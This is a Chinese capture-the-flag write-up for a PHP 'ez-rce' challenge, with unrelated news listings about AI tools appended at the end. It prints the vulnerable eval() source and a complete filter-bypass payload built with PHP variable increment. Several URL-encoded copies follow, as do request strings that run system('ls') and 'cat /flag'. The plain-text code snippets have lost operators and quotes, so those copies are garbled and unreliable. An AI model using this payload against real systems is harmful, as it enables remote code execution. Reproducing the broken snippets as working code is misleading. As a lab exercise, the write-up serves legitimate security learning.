ez-rce
题目信息题目名称: ez-rce提示: 303跳转 你需要用bp抓包 参考RCE里的无字母数字信息收集通过抓包分析在响应头中发现隐藏路径!-- /s3cret/rce.php --访问该路径得到题目源码。源码分析?php highlight_file(__FILE__); if (isset($_GET[shell])) { $code $_GET[shell]; if(!preg_match(/[a-zA-Z0-9#%^*:{}\-\?\|~\\\\]/,$code)){ eval($code); } else{ die(hacker你想幹嘛); } }代码功能分析接收shell参数并执行eval()正则表达式过滤了所有字母数字和大部分特殊字符只允许部分字符通过包括[]._;()$漏洞分析过滤绕过原理由于过滤了所有字母和数字需要利用 PHP 的变量自增特性来构造可执行的代码。PHP 变量自增原理$a []._; // $a 为 Array_ echo $a[0]; // 会输出A $b $a[0]; echo $b; // 会输出B因为数字也被过滤变量名可以用下划线替代数组索引也可以用下划线替代$_ []._; echo $_[_]; // 输出A构造 Payload目标构造$_GET[_]($_GET[__])通过变量自增逐步构造$_[]._得到 “Array_”$_$_[_]得到 “A”通过$_自增得到 “B”、”C”、”D”、”E”继续自增构造其他字母最终拼接出 “_GET” 字符串完整 payload$_[]._;$_$_[_];$_;$_;$_;$_;$__$_;$_;$_;$___$_;$_;$_;$_;$_;$_;$_;$_;$_;$_;$_;$_;$_;$_;$___$___.$__.$_;$__.$___;$$_[_]($$_[__]);URL 编码由于中间件会解码一次所以需要对 payload 进行 URL 全编码%24%5F%3D%5B%5D%2E%5F%3B%24%5F%3D%24%5F%5B%5F%5D%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%5F%3D%24%5F%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%5F%5F%3D%24%5F%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%5F%5F%3D%24%5F%5F%5F%2E%24%5F%5F%2E%24%5F%3B%24%5F%3D%27%5F%27%2E%24%5F%5F%5F%3B%24%24%5F%5B%5F%5D%28%24%24%5F%5B%5F%5F%5D%29%3B利用步骤构造 Payload使用变量自增构造出$_GET[_]($_GET[__])的等效代码$_[]._;$_$_[_];$_;$_;$_;$__$_;$_;$_;$___$_;$_;$_;$_;$_;$_;$_;$_;$_;$_;$_;$_;$_;$_;$___$___.$__.$_;$__.$___;$$_[_]($$_[__]);URL 全编码对 payload 进行 URL 全编码确保中间件解码后仍能正常执行%24%5F%3D%5B%5D%2E%5F%3B%24%5F%3D%24%5F%5B%5F%5D%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%5F%3D%24%5F%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%5F%5F%3D%24%5F%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%5F%5F%3D%24%5F%5F%5F%2E%24%5F%5F%2E%24%5F%3B%24%5F%3D%27%5F%27%2E%24%5F%5F%5F%3B%24%24%5F%5B%5F%5D%28%24%24%5F%5B%5F%5F%5D%29%3B执行命令构造完整的 URL通过shell参数传递 payload并使用_和__参数传递要执行的函数和参数?shell%24%5F%3D%5B%5D%2E%5F%3B%24%5F%3D%24%5F%5B%5F%5D%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%5F%3D%24%5F%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%5F%5F%3D%24%5F%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%5F%5F%3D%24%5F%5F%5F%2E%24%5F%5F%2E%24%5F%3B%24%5F%3D%27%5F%27%2E%24%5F%5F%5F%3B%24%24%5F%5B%5F%5D%28%24%24%5F%5B%5F%5F%5D%29%3B_system__ls获取 Flag将__参数替换为读取 flag 的命令?shell%24%5F%3D%5B%5D%2E%5F%3B%24%5F%3D%24%5F%5B%5F%5D%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%5F%3D%24%5F%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%5F%5F%3D%24%5F%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%2B%2B%3B%24%5F%5F%5F%3D%24%5F%5F%5F%2E%24%5F%5F%2E%24%5F%3B%24%5F%3D%27%5F%27%2E%24%5F%5F%5F%3B%24%24%5F%5B%5F%5D%28%24%24%5F%5B%5F%5F%5D%29%3B_system__cat%20/flag原理详解PHP 变量自增机制PHP 中字符串可以像数组一样访问索引当对字符串进行自增操作时PHP 会按照字母表顺序递增$a A; $a; // B $a; // C数组字符串化当数组与字符串连接时数组会被转换为字符串 “Array”$a []; echo $a . _; // 输出 Array_字符串索引访问可以通过索引访问字符串中的字符$str Array_; echo $str[0]; // 输出 A下划线作为索引由于数字被过滤可以使用下划线作为数组索引PHP 会将下划线转换为 0$_ Array_; echo $_[_]; // 等同于 $_[0]输出 A总结本题利用了 PHP 的变量自增特性和字符串操作机制在过滤所有字母数字的情况下通过构造特殊字符的 payload 实现了代码执行。关键在于理解 PHP 中数组字符串化、字符串索引访问以及变量自增的工作原理并通过 URL 全编码绕过中间件的解码机制。关键点通过抓包发现隐藏路径/s3cret/rce.php利用 PHP 数组字符串化特性获取 “Array” 字符串通过变量自增构造字母使用下划线替代数字作为数组索引拼接构造出_GET字符串通过 URL 全编码绕过中间件解码最终实现动态函数调用$_GET[_]($_GET[__])

相关新闻

Qwen-Image-2512-SDNQ MATLAB下载安装集成:科研工作流优化

Qwen-Image-2512-SDNQ MATLAB下载安装集成:科研工作流优化

Qwen-Image-2512-SDNQ MATLAB下载安装集成:科研工作流优化 为科研工作者打造的MATLAB与AI视觉模型无缝集成指南 1. 开篇:为什么科研需要MATLABAI视觉集成 如果你正在做计算机视觉、医学影像分析、遥感图像处理或者其他需要大量图像生成的科研工作&#…

2026/7/5 14:58:43 阅读更多 →
Clawdbot平台优化:Python爬虫与Qwen3-32B数据处理

Clawdbot平台优化:Python爬虫与Qwen3-32B数据处理

Clawdbot平台优化:Python爬虫与Qwen3-32B数据处理 1. 引言 在日常工作中,我们经常需要从各种网站获取数据进行分析。传统的手工复制粘贴不仅效率低下,还容易出错。想象一下,你需要每天监控竞争对手的价格变化,或者需…

2026/5/17 9:18:54 阅读更多 →
OpenClaw安装配置

OpenClaw安装配置

OpenClaw 阿里云 Coding Plan 安装配置 相关博客: 【保姆级教程】手把手教你安装OpenClaw并接入飞书,让AI在聊天软件里帮你干活-腾讯云开发者社区-腾讯云 OpenClaw (Clawdbot) 教程 | 菜鸟教程 阿里云百炼 Coding Plan - AI 编码订阅计划 - 阿里云 …

2026/5/17 9:18:52 阅读更多 →

最新新闻

oyunfor土区礼品卡购买教程及踩坑记录

oyunfor土区礼品卡购买教程及踩坑记录

前置条件🔮我用的美丽国 chorme浏览器(edge没成功) 可安装翻译插件 招商银行万事达(研究生优选) 网络连接设置 属性里取消勾选ipv6协议(买好再改回来)1.注册账号需🔮 用的QQ邮箱,Gmail邮箱收不到验证码 其他信息正常填写,号码862.…

2026/7/5 15:10:30 阅读更多 →
教师资格证认定

教师资格证认定

前言 认定是获取教师资格证的第三个环节,也是最后一个环节。认定通过之后,即可取得教师资格证。 认定时间和认定条件 认定时间 每年的教师资格认定工作有上半年和下半年两个批次。不同于笔试和面试,教师资格证认定的时间并非全国统一。认定的…

2026/7/5 15:10:29 阅读更多 →
NTP算法实现客户端与服务器时间同步

NTP算法实现客户端与服务器时间同步

基于四时间戳(T1~T4)的NTP级时间同步机制:通过分离 Client→Server 与 Server→Client 传输时间计算延迟时间,通过记录请求发送(T1)、服务端接收(T2)/回复(T3)、客户端接收(T4)四个时间戳,利用对称消除公式 Offset (T…

2026/7/5 15:10:29 阅读更多 →
新e选烤火罩异味[主里料] GB 18401—2010 6.7 判定符合检测标准与测试条件

新e选烤火罩异味[主里料] GB 18401—2010 6.7 判定符合检测标准与测试条件

国标要求:纺织品无异味;恒温密闭环境专业嗅辨。实测结果内里衬料无任何化工、塑胶、胶水异味,嗅辨合格。家用实用优势部分烤火罩外层做除味处理,但内里廉价衬布残留浓烈胶水味,高温烘烤后异味从内部散发。新e选烤火罩里…

2026/7/5 15:08:29 阅读更多 →
STM32与EEPROM数据存储可靠性设计与优化实践

STM32与EEPROM数据存储可靠性设计与优化实践

1. 项目背景与核心需求在嵌入式系统开发中,数据存储的可靠性往往决定了整个系统的稳定性。我最近为一个工业传感器网络项目设计数据存储方案时,深刻体会到选择合适存储器件的重要性。这个网络需要持续记录环境参数,并在断电后仍能保存关键数据…

2026/7/5 15:06:29 阅读更多 →
如何用ConvertToUTF8解决Sublime Text中文乱码:3步快速上手指南

如何用ConvertToUTF8解决Sublime Text中文乱码:3步快速上手指南

如何用ConvertToUTF8解决Sublime Text中文乱码:3步快速上手指南 【免费下载链接】ConvertToUTF8 A Sublime Text 2 & 3 plugin for editing and saving files encoded in GBK, BIG5, EUC-KR, EUC-JP, Shift_JIS, etc. 项目地址: https://gitcode.com/gh_mirro…

2026/7/5 15:02:28 阅读更多 →

日新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/5 0:03:34 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/5 0:03:34 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/5 0:07:38 阅读更多 →

周新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/5 0:03:34 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/5 0:03:34 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/5 0:07:38 阅读更多 →

月新闻